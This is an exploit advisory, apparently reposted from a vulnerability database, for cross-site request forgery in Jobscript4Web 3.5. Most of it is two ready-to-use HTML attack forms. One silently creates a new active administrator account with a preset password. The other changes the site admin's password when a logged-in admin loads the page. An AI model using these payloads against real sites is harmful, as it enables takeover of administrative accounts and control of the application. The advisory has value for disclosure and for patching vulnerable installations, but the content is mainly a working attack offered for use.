Jobscript4Web 3.5 multiple cross site request forgery

2009.12.21
Credit: bi0
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

______ __ ______ /\ == \ /\ \ /\ __ \ \ \ __< \ \ \ \ \ \/\ \ \ \_____\ \ \_\ \ \_____\ \/_____/ \/_/ \/_____/ 01000010 01101001 01001111 [#]----------------------------------------------------------------[#] # # [+] Jobscript4Web 3.5 Multiple CSRF Vulnerability # # // Author Info # [x] Author: bi0 # [x] Contact: bukibv@hotmail.com # [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and all my friends # [x] Irc : irc.freenode.net / #security-shell # [*] Note : R.I.P Rock4eveR,We`ll never forget you ! # [#]-------------------------------------------------------------------------------------------[#] # # [x] Exploit : # # // CSRF to Create an Admin Account # #================================================================# <html> <body> <!-- Create new Admin --> <form name="frmsignup" id="frmsignup" action="http://[server]/admin/admin_staffs" method="post"> <input name="name" type="text" id="name" value="Name"> <input name="username" type="text" id="username" value="Username"> <input name="pass" type="text" id="pass" value="test123"> <input name="email" type="text" id="email" value="email@somtging.com"> <input type="hidden" id="status" value="Active" name="status" > <input name="Submit" type="submit" value="Submit"> </body> </html> #================================================================# # // CSRF to Change Admin Password # #================================================================# <html> <body> <!-- Change Admin Password --> <form name="signupForm" id="signupForm" action="http://[server]/admin/adminpass_submit.php" method="post"> <input name="txtp" type="password" id="txtp" value="password1"> <input name="txtcp" type="password" id="txtcp" value="password1"> <input type="submit" name="Submit" value="Submit"> </body> </html> #================================================================# [#]------------------------------------------------------------------------------------------[#] #EOF


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top